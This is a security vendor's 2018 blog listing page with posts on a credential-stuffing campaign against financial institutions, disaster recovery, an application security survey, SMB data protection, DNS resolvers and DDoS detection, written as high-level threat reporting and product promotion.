main

Application SecuritySecurityWeb Application Firewall

Credential Stuffing Campaign Targets Financial Services

October 23, 2018 — by Daniel Smith0

credential_financial_hacking-960x677.jpg

Over the last few weeks, Radware has been tracking a significant Credential Stuffing Campaign targeting the financial industry in the United States and Europe.

Background

Credential Stuffing is an emerging threat in 2018 that continues to accelerate as more breaches occur. Today, a breach doesn’t just impact the compromised organization and its users, but it also affects every other website that the users may use.

Additionally, resetting passwords for a compromised application will only solve the problem locally while criminals are still able to leverage those credentials externally against other applications due to poor user credential hygiene.

Credential Stuffing is a subset of brute force attacks but is different from Credential Cracking. Credential Stuffing campaigns do not involve the process of brute forcing password combinations. Credential Stuffing campaigns leverage leaked username and passwords in an automated fashion against numerous websites in an attempt to take over users accounts due to credential reuse.

Criminals, like researchers, collect and data mine leaks databases and breached accounts for several reasons. Typically cybercriminals will keep this information for future targeted attacks, sell it for profit or exploit it in fraudulent ways.

The motivations behind the current campaign that Radware is seeing are strictly fraud related. Criminals are using credentials from prior data breaches in an attempt to gain access and take over user’s bank accounts. These attackers have been seen targeting financial organizations in both the United States and Europe. When significant breaches occur, the compromised email addresses and passwords are quickly leveraged by cybercriminals. Armed with tens of millions of credentials from a recently breached website, attackers will use these credentials along with scripts and proxies to distribute their attack in an automated fashion against the financial institution in an attempt to take over banking accounts. These login attempts can happen in such volumes that they resemble a Distributed Denial of Service (DDoS) attack.

Attack Methods

Credential Stuffing is one of the most commonly used attack vectors by cybercriminals today. It’s an automated web injection attack where criminals use a list of breached credentials in an attempt to gain access and take over accounts across different platforms due to poor credential hygiene. Attackers will route their login request through proxy servers to avoid blacklisting their IP address.

Attackers automate the logins of millions of previously discovered credentials with automation tools like cURL and PhantomJS or tools designed specifically for the attack like Sentry MBA and SNIPR.

This threat is dangerous to both the consumer and organizations due to the ripple effect caused by data breaches. When a company is breached, those credentials compromised will either be used by the attacker or sold to other cybercriminals. Once credentials reach its final destination, a for-profit criminal will use that data, or credentials obtain from a leak site, in an attempt to take over user accounts on multiple websites like social media, banking, and marketplaces. In addition to the threat of fraud and identity theft to the consumer, organizations have to mitigate credential stuffing campaigns that generate high volumes or login requests, eating up resources and bandwidth in the process.

Credential Cracking

Credential Cracking attacks are an automated web attack where criminals attempt to crack users password or PIN numbers by processing through all possible combines of characters in sequence. These attacks are only possible when applications do not have a lockout policy for failed login attempts.

Attackers will use a list of common words or recently leaked passwords in an automated fashion in an attempt to take over a specific account. Software for this attack will attempt to crack the user’s password by mutating, brute forcing, values until the attacker is successfully authenticated.

Targets

In recent campaigns, Radware has seen financial institutions targeted in both the United States and Europe by Credential Stuffing campaigns.

Crimeware

Sentry MBA – Password Stuffing Toolkit

Sentry MBA is one of the most popular Credential Stuffing toolkits used by cybercriminals today. This tool is hosted on the Sentry MBA crackers forum. The tool simplifies and automates the process of checking credentials across multiple websites and allows the attackers to configure a proxy list so they can anonymize their login requests.

SNIPR – Credential Stuffing Toolkit

SNIPR is a popular Credential Stuffing toolkit used by cybercriminals and is found hosted on the SNIPR crackers forums. SNIPR comes with over 100 config files preloaded and the ability to upload personal config files to the public repository.

Reasons for Concern

Recent breaches over the last few years have exposed hundreds of millions of user credentials. One of the main reasons for concern of a Credential Stuffing campaign is due to the impact that it has on the users. Users who reuse credentials across multiple websites are exposing themselves to an increased risk of fraud and identity theft.

The second concern is for organizations who have to mitigate high volumes of fraudulent login attempts that can saturate a network. This saturation can be a cause for concern, as it will appear to be a DDoS attack, originating from random IP addresses coming from a variety of sources, including behind proxies. These requests will look like legitimate attempts since the attacker is not running a brute force attack. If the user: pass for that account does not exist or authenticate on the targeted application the program will move on to the next set of credentials.

Mitigation

In order to defend against a Credential Stuffing campaign,  organizations need to deploy a WAF that can properly fingerprint and identify malicious bot traffic as well as automated login attacks directed at your web application. Radware’s AppWall addresses the multiples challenges faced by Credential Stuffing campaigns by introducing additional layers of mitigation including activity tracking and source blocking.

Radware’s AppWall is a Web Application Firewall (WAF) capable of securing Web applications as well as enabling PCI compliance by mitigating web application security threats and vulnerabilities. Radware’s WAF prevents data from leaking or being manipulated which is critically important in regard to sensitive corporate data and/or information about its customers.

The AppWall security filter also detects such attempts to hack into the system by checking the replies sent from the Web server for Bad/OK replies in a specific timeframe. In the event of a Brute Force attack, the number of Bad replies from the Web server (due to a bad username, incorrect password, etc.) triggers the BruteForce security filter to monitor and take action against that specific attacker. This blocking method prevents a hacker from using automated tools to carry out an attack against Web application login page.

In addition to these steps, network operators should apply two-factor authentication where eligible and monitor dump credentials for potential leaks or threats.

Effective Web Application Security Essentials

  • Full OWASP Top-10 coverage against defacements, injections, etc.
  • Low false positive rate – using negative and positive security models for maximum accuracy
  • Auto policy generation capabilities for the widest coverage with the lowest operational effort
  • Bot protection and device fingerprinting capabilities to overcome dynamic IP attacks and achieve improved bot detection and blocking
  • Securing APIs by filtering paths, understanding XML and JSON schemas for enforcement, and activity tracking mechanisms to trace bots and guard internal resources
  • Flexible deployment options – on-premise, out-of-path, virtual or cloud-based

Read “Radware’s 2018 Web Application Security Report” to learn more.

Download Now

DDoSSecurity

Disaster Recovery: Data Center or Host Infrastructure Reroute

October 11, 2018 — by Daniel Lakier1

disaster-recovery-data-center-host-infrastructure-reroute-blog-960x540.jpg

Companies, even large ones, haven’t considered disaster recovery plans outside of their primary cloud providers own infrastructure as regularly as they should. In March of this year, Amazon Web Services (AWS) had a massive failure which directly impacted some of the world’s largest brands, taking them offline for several hours. In this case, it was not a malicious attack but the end result was the same— an outage.

When the organization’s leadership questioned their IT departments on how this outage could happen, most received an answer that was somehow acceptable:  It was AWS. Amazon failed, not us. However, that answer should not be acceptable.

AWS implies they are invulnerable, but the people running IT departments are running it for a reason. They are meant to be skeptics, and it is their job to build redundancies that protect the system against any one point of failure.  Some of those companies use AWS disaster recovery services, but if the data center and all the technology required to turn those fail-safes on crashes, then you’re down. This is why we need to treat the problem with the same logic that we use for any other system. Today it is easier than ever to create a resilient DoS resistant architecture that not only takes traditional malicious activity into account but also critical business failures. The solution isn’t purely technical either, it needs to be based upon sound business principles using readily available technology.

[You might also like: DDoS Protection is the Foundation for Application, Site and Data Availability]

In the past enterprise disaster recovery architecture revolved around having a fully operational secondary location. If we wanted true resiliency that was the only option. Today although that can still be one of the foundation pillars to your approach it doesn’t have to be the only answer. You need to be more circumspect about what your requirements are and choose the right solution for each environment/problem.  For example:

  • A) You can still build it either in your own data center or in a cloud (match the performance requirements to a business value equation).
  • B) Several ‘Backups-as-a-Service’ will offer more than just storage in the cloud. They offer resources for rent (servers to run your corporate environments in case of an outage). If your business can sustain an environment going down just long enough to turn it back on (several hours), this can be a very cost-effective solution.
  • C) For non-critical items, rely on the cloud provider you currently use to provide near-time failure protection.

The Bottom Line

Regardless of which approach you take, even if everything works flawlessly, you still need to address the ‘brownout’ phenomenon or the time it takes for services to be restored at the primary or to a secondary location. It is even more important to automatically send people to a different location if performance is impaired. Several people have heard of GSLB, and while many use it today, it is not part of their comprehensive DoS approach.  But it should be. If your goal with your DDoS mitigation solution is to ensure an uninterrupted service in addition to meeting your approved performance SLA; then dynamic GSLB or infrastructure based performance load balancing has to be an integral part of any design.

We can deploy this technology purely defensively, as we have traditionally done with all DoS investments or we change the paradigm and deploy the technology to help us exceed expectations. This allows us to give each individual user the best experience possible. Radware’s dynamic performance-based route optimization solution (GSLB) allows us to offer a unique customer experience to each and every user regardless of where they are coming from, how they access the environment or what they are trying to do. This same technology allows us to reroute users in the event of a DoS event that takes down an entire site be it from malicious behavior, hardware failure or simple human error. This functionality can be procured as a product or a service as it is environment/cloud agnostic and relatively simple to deploy. It is not labor intensive and may be the least expensive part of an enterprise DOS architecture.

What we can conclude is that any company that blames the cloud provider for a down site in the future should be asked the hard questions because solving this problem is easier today than ever before.

Read “Radware’s 2018 Web Application Security Report” to learn more.

Download Now

Application SecurityAttack MitigationSecurityWeb Application Firewall

Are Your Applications Secure?

October 3, 2018 — by Ben Zilberman2

WAF_REPORT_BLOG_Cover_img-960x715.jpg

Executives express mixed feelings and a surprisingly high level of confidence in Radware’s 2018 Web Application Security Report. 

As we close out a year of headline-grabbing data breaches (British Airways, Under Armor, Panera Bread), the introduction of GDPR and the emergence of new application development architectures and frameworks, Radware examined the state of application security in its latest report. This global survey among executives and IT professionals yielded insights about threats, concerns and application security strategies.

The common trend among a variety of application security challenges including data breaches, bot management, DDoS mitigation, API security and DevSecOps, was the high level of confidence reported by those surveyed. 90% of all respondents across regions reported confidence that their security model is effective at mitigating web application attacks.

Attacks against applications are at a record high and sensitive data is shared more than ever. So how can execs and IT pros have such confidence in the security of their applications?

To get a better understanding, we researched the current threat landscape and application protection strategies organizations currently take. Contradicting evidence stood out immediately:

  • 90% suffered attacks against their applications
  • One in three shared sensitive data with third parties
  • 33% allowed third parties to create/modify/delete data via APIs
  • 67% believed a hacker can penetrate their network
  • 89% saw web-scraping as a significant threat to their IP
  • 83% run bug bounty programs to find vulnerabilities they miss

There were quite a few threats to application services that were not properly addressed, challenging traditional security approaches. In parallel, the adoption of emerging frameworks and architectures, which rely on numerous integrations with multiple services, adds more complexity and increases the attack surface.

Current Threat Landscape

Last November, OWASP released a new list of top 10 vulnerabilities in web applications. Hackers continue to use injections, XSS, and a few old techniques such as CSRF, RFI/LFI and session hijacking to exploit these vulnerabilities and gain unauthorized access to sensitive information. Protection is becoming more complex as attacks come through trusted sources such as a CDN, encrypted traffic, or APIs of systems and services we integrate with. Bots behave like real users and bypass challenges such as CAPTCHA, IP-based detection and others, making it even harder to secure and optimize the user experience.

[You might also like: WAFs Should Do A  Lot More Against Current Threats Than Covering OWASP Top 10]

Web application security solutions must be smarter and address a broad spectrum of vulnerability exploitation scenarios. On top of protecting the application from these common vulnerabilities, it has to protect APIs and mitigate DoS attacks, manage bot traffic and make a distinction between legitimate bots (search engines for instance) and bad ones like botnets, web-scrapers and more.

DDoS Attacks

63% suffered a denial of service attack against their application. DoS attacks render applications inoperable by exhausting the application resources. Buffer overflow and HTTP floods were the most common types of DoS attacks, and this form of attack is more common in APAC. 36% find HTTP/Layer-7 DDoS as the most difficult attack to mitigate. Half of the organizations take rate-based approaches (such as limiting the number of request from a certain source or simply buying a rate-based DDoS protection solution) which are ineffective once the threshold is exceeded and real users can’t connect.

API Attacks

APIs simplify the architecture and delivery of application services and make digital interactions possible. Unfortunately, they also introduce a wide range of risks and vulnerabilities as a backdoor for hackers to break into networks. Through APIs, data is exchanged in HTTP where both parties receive, process and share information. A third party is theoretically able to insert, modify, delete and retrieve content from applications. This is nothing but an invitation to attack:

  • 62% of respondents did not encrypt data sent via API
  • 70% of respondents did not require authentication
  • 33% allowed third parties to perform actions (GET/ POST / PUT/ DELETE)

Attacks against APIs:

  • 39% Access violations
  • 32% Brute-force
  • 29% Irregular JSON/XML expressions
  • 38% Protocol attacks
  • 31% Denial of service
  • 29% Injections

Bot Attacks

The amount of both good and bad bot traffic is growing. Organizations are forced to increase network capacity and need to be able to precisely tell a friend from a foe so both customer experience and security are maintained. Surprisingly, 98% claimed they can make such a distinction. However, a similar amount sees web-scraping as a significant threat. 87% were impacted by such an attack over the past 12 months, despite a variety of methods companies use to overcome the challenge – CAPTCHA, in-session termination, IP-based detection or even buying a dedicated anti-bot solution.

Impact of Web-scraping:

  • 50% gathered pricing information
  • 43% copied website
  • 42% theft of intellectual property
  • 37% inventory queued/being held by bots
  • 34% inventory held
  • 26% inventory bought out

Data Breaches

Multinational organizations keep close tabs on what kinds of data they collect and share. However, almost every other business (46%) reports having suffered a breach. On average an organization suffers 16.5 breach attempts every year. Most (85%) take between hours and days to discover. Data breaches are the most difficult attack to detect, as well as mitigate, in the eyes of our survey respondents.

How do organizations discover data breaches?

  • 69% Anomaly detection tools/SIEM
  • 51% Darknet monitoring service
  • 45% Information was leaked publicly
  • 27% Ransom demand

IMPACT OF ATTACKS

Negative consequences such as loss of reputation, customer compensation, legal action (more common in EMEA), churn (more common in APAC), stock price drops (more common in AMER) and executives who lose their jobs are quick to follow a successful attack, while the process of repairing the damage of a company’s reputation is long and not always successful. About half admitted having encountered such consequences.

Securing Emerging Application Development Frameworks

The rapidly growing amount of applications and their distribution across multiple environments requires adjustments that lead to variations once a change to the application is needed. It is nearly impossible to deploy and maintain the same security policy efficiently across all environments. Our research shows that ~60% of all applications undergo changes on a weekly basis. How can the security team keep up?

While 93% of organizations use a web application firewall (WAF), only three in ten use a WAF that combines both positive and negative security models for effective application protection.

Technologies Used By DevOps

  • 63% – DevOps and Automation Tools
  • 48% – Containers (3 in 5 use Orchestration)
  • 44% – Serverless / FaaS
  • 37% – Microservers

Among the respondents that used micro-services, one-half rated data protection as the biggest challenge, followed by availability assurance, policy enforcement, authentication, and visibility.

Summary

Is there a notion that organizations are confident? Yes. Is that a false sense of security? Yes. Attacks are constantly evolving and security measures are not foolproof. Having application security tools and processes in place may provide a sense of control but they are likely to be breached or bypassed sooner or later. Another question we are left with is whether senior management is fully aware of the day to day incidents. Rightfully so, they look to their internal teams tasked with application security to manage the issue, but there seems to be a disconnect between their perceptions of the effectiveness of their organizations’ application security strategies and the actual exposure to risk.

Read “Radware’s 2018 Web Application Security Report” to learn more.

Download Now

Application SecurityCloud SecurityDDoS AttacksSecurityWAF

Protecting Sensitive Data: The Death of an SMB

September 26, 2018 — by Mike O'Malley0

protecting-sensitive-data-death-of-small-medium-business-960x522.jpg

True or False?

90% of small businesses lack any type of data protection for their company and customer information.

The answer?

Unfortunately true.

Due to this lack of care, 61% of data breach victims are specifically small businesses according to service provider Verizon’s 2018 Data Breach Investigations.

Although large corporations garner the most attention in mainstream headlines, small and mid-sized businesses (SMB) are increasingly attractive to hackers because of the combination of valuable records and lack of security protections. The high priority of sensitive data protection should not be limited to large companies but for organizations of all sizes.

While large corporations house large amounts of data, they are also capable of supporting their data center with the respective necessary protections. The combination of lacking security resources while maintaining sensitive personal information is what makes smaller-sized businesses the perfect targets for attackers. Hackers aren’t simply looking at how much information they can gather, but at the ease of access to that data – an area where SMB’s are largely deficient.

The bad publicity and dark connotation that data breaches hold create a survive-or-die situation for SMBs, but there are ways SMBs can mitigate the threat despite limited resources – and they exist in the cloud.

The Struggle to Survive

Because of their smaller stature as a company, most SMBs struggle with the ability to manage cybersecurity protections and mitigation of attacks – especially data breaches. In fact, financial services company UPS Capital found that 60% of smaller businesses fall out of business within six months after a cyberattack. Unlike business giants, SMBs cannot afford the financial hit of data breaches.

Security and privacy of sensitive data is a trending hot topic in today’s society, becoming more of an influence on customers’ purchase decisions. Customers are willing to pay more for provided security protections. Auditor giant KPMG reports that for mobile service providers alone, consumers would not hesitate to switch carriers if one provided better security than the other, as long as pricing is competitive or even for a moderate premium.

[You might also like: Protecting Sensitive Data: What a Breach Means to Your Business]

One Person Just Isn’t Enough

Many SMBs tend to prioritize their business over cybersecurity because of the false belief that attackers would go after large companies first. Research Center Ponemon Institute reports that 51% of its survey respondents say their company believes they are too small to be targeted. For businesses that do invest in cybersecurity, they narrowly focus on anti-virus solutions and neglect other types of attacks such as DDoS, malware, and system exploits that intrusion detection systems can protect from.

Auto dealerships, for example, are typically family-owned and operated businesses, valued at $4 million USD, with typically an average of 15-20 employees overall. Because of its size, of that number of employees there is typically only one employee that manages the IT responsibilities. Dealerships attempt to satisfy the need of security protection with this employee that has relevant certifications and experience; they are equipped with resources to support their day-to-day tasks, but not to manage high-level attacks and threats. Ponemon Institute’s research reports that 73% of its respondents believe they are unable to achieve full effective IT security because of insufficient personnel.

A study conducted by news publication Automotive News found that 33% of consumers lack confidence in the security protection of sensitive data at dealerships. The seriousness of cybersecurity protection, however, should not correlate to the number of employees but the amount and value of the sensitive data collected. The common error dealerships make isn’t the lack of care in their handling of sensitive data, but the underestimation of their likelihood of being attacked.

Dealerships collect valuable consumer information, both personal and financial – ranging from driver’s license information to social security numbers, to bank account information, and even past vehicle records. An insufficient budget and management of IT security make auto dealerships a prime target. In fact, software company MacKeeper in 2016 revealed a massive data breach of 120+ U.S. dealership systems made available on Shodan – a search engine for connected, but unsecured databases and devices. The source of the breach originated from backing up individual data systems to the vendor’s common central systems, without any cybersecurity protections in place.

The Answer is in the Clouds

Cybersecurity is often placed on the backburner of company priorities, perceived as an unnecessary expenditure because of the flawed perception and underestimated likelihood of being attacked. However, the level of protection over personal data is highly valued among today’s consumers and is enough to be the deciding factor for which OS or mobile app/site people would frequent, and likely which SMB they would patronize.

Witnessing the growing trend of data breaches and the rapid advancements of cyberattacks, SMBs are taking note and beginning to increase spending. It is crucial for organizations to not only increase their security budget but to spend it effectively and efficiently. Research firm Cyren and Osterman Research found that 63% of SMBs are increasing their security spending, but still experience breaches.

Internal security systems may seem more secure to smaller business owners, but SMBs lack the necessary security architecture and expertise to safeguard the data being housed. Cloud solutions offer what these businesses need: a data storage system with better security protection services. Meanwhile, in the same Cyren and Osterman Research report, only 29% of IT managers are open to utilizing cloud services. By utilizing cloud-based security as a solution, small-and medium-sized businesses no longer have to depend on one-staff IT departments, but can focus on the growth of their business. Cloud-based security solutions provide enterprise-grade protection alongside improved flexibility and agility that smaller organizations typically lack compared to their large-scale brethren.

Managed security vendors offer a range of fully-managed cloud security solutions for cyberattacks from WAF to DDoS. They are capable of providing more accurate real-time protection and coverage. Although the security is provided by an outside firm, reports and audits can be provided for a deeper analysis of not only the attacks but the company’s defenses. Outsourcing this type of security service to experts enables SMBs to continue achieving and prioritizing their business goals while protecting their work and customer data.

Read the “2018 C-Suite Perspectives: Trends in the Cyberattack Landscape, Security Threats and Business Impacts” to learn more.

Download Now

Attack Types & VectorsSecurity

Free DNS Resolver Services and Data Mining

August 22, 2018 — by Lior Rozen1

dns_resolver_services_data_mining-960x640.jpg

Why would companies offer free DNS recursive servers? DNS data is extremely valuable for threat intelligence. If a company runs a recursive DNS for consumers, it can collect data on new domains that “pop up”. It can analyze trends, build baselines on domain resolution and enrich its threat intelligence overall (machine learning and big data are often used here). Companies can also sell this data to advertisers to measure site ratings and build user profiles.

The DNS resolver market for consumers is ruled by ISPs, as well as some other known servers by Google (8.8.8.8) and Level3 (CenturyLink). Since Cisco bought OpenDNS in August 2015, it has also become a major player, offering DNS services for individuals and organizations with its cloud security platform, Umbrella. Cisco OpenDNS focuses on malware prevention, as well as parental control for consumers. Akamai is also involved in the market, offering both recursive DNS for enterprises (a rather new service, based on a 2015 acquisition of Xerocole), and authorizes DNS services for their CDN clients. In several publications, Akamai claims to see more than 30% of internet data and is using this data as an add-on feed to its KONA service.

[You might also like: DNS and DNS Attacks]

In the Fall of 2017, IBM announced its new quad 9 (9.9.9.9) DNS service. This security-focused DNS uses IBM’s threat intelligence to prevent revolving known malicious domains (and protect against Malware) with approximately 70 servers worldwide. It claims to offer decent speed, and IBM has promised not to store any personal information (PII). On April 1, 2018, Cloudflare came out with a new quad 1 resolver – 1.1.1.1– that focuses on speed. With more than 1,000 servers, it promises to be the fastest resolver to any location. Additionally, Cloudflare promises never to sell the resolving user data, and to delete the resolver logs every 24 hours. Several independent measurements have confirmed Cloudflare’s success on speed which is typically the fastest after the ISP resolver. The one issue with a large number of servers is diffusion time as quad 1 takes significantly more time than other DNS providers to update about changing DNS records.

Another DNS initiative is DoH – DNS over HTTPS. This is a new standard proposal which is reviewed as the encrypted version of DNS (like HTTPS to HTTP). The focus here is both on privacy and security as DNS requests are done over HTTPS to prevent any interception of the request. If a user is using a different DNS, the ISP can still track the clear-text DNS requests, log them, or override them to use its own DNS resolver. The DoH protocol prevents this. Two major cloud DNS recursive servers support this protocol – the recent quad 1 by Cloudflare and Google’s DNS, as well as some other smaller ones. Mozilla recently ran a PoC with native Firefox support for DoH which was described here by Ars Technica.

[You might also like: DNS Reflective Attacks]

As we’ve shown, the DNS continues to evolve, both as a spec and as a service. Companies continue to invest a lot of money in collecting DNS data as they see the value in it. While each company provides a slightly different service, most are looking to mine the data for their own purposes. In order to do that, companies will be happy to provide the DNS service for free and compete in this saturated market.

Read “Radware’s 2017-2018 Global Application & Network Security Report” to learn more.

Download Now

Attack Types & VectorsSecurity

Can SNMP (Still) Be Used to Detect DDoS Attacks?

August 9, 2018 — by Pascal Geenens3

snmp-burst-attacks-ddos-960x576.jpg

SNMP is an Internet Standard protocol for collecting information about managed devices on IP networks. SNMP became a vital component in many networks for monitoring the health and resource utilization of devices and connections. For a long time, SNMP was the tool to monitor bandwidth and interface utilization. In this capacity, it is used to detect line saturation events caused by volumetric DDoS attacks on an organization’s internet connection. SNMP is adequate as a sensor for threshold-based volumetric attack detection and allows automated redirection of internet traffic through cloud scrubbing centers when under attack. By automating the process of detection, mitigation time can considerably be reduced and volumetric attacks mitigated through on-demand cloud DDoS services. SNMP provides minimal impact on the device’s configuration and works with pretty much any network device and vendor. As such, it is very convenient and gained popularity for deployments of automatic diversion.

Attack Types & VectorsDDoSSecurity

DNS: Strengthening the Weakest Link

August 2, 2018 — by Radware0

dns-attacks-960x640.jpg

One in three organizations hit by DDoS attacks experienced an attack against their DNS server. Why is DNS such an attractive target? What are the challenges associated with keeping it secure? What attack vectors represent the worse of the worst when it comes to DNS assaults? Based on research from Radware’s 2017-2018 Global Application & Network Security Report, this piece answers all those questions and many more.

DDoSSecurity

Be Certain and Specific when Fighting DDoS Attacks

July 19, 2018 — by Ray Tamasovich1

ddos-attacks-960x613.jpg

I was visiting a prospect last week and at the very beginning of the meeting he asked directly, “Why would I consider your products and services over the many others that claim to do the exact same thing?”  I immediately said, “That’s easy! Certainty and specificity.”  He looked at me, expecting more than a 5-word answer. When I did not provide one, he asked me to please explain. I told him that any number of the products or services on the market are capable of keeping your circuits from being overrun by a volumetric DDoS attack, but that if he wanted to be certain he was not blocking legitimate business users or customers, and if he wanted to be specific about the traffic he was scrubbing, he would need to consider my solution.

DDoSSecurityWAF

Building Tier 1 IP Transit – What’s Involved and Why Do It?

July 11, 2018 — by Richard Cohen4

ip-transit-960x540.jpg

Not all internet connectivity is created equal. Many Tier 2 and Tier 3 ISPs, cloud service providers and data integrators consume IP Transit sourced from Tier 1 Wholesale ISPs (those ISP’s that build and operate their own fabric from L1 services up). In doing so, their ability to offer their customers internet services customised to particular requirements is limited by the choices they have available to them – and many aspects of the services they consume may not be optimal.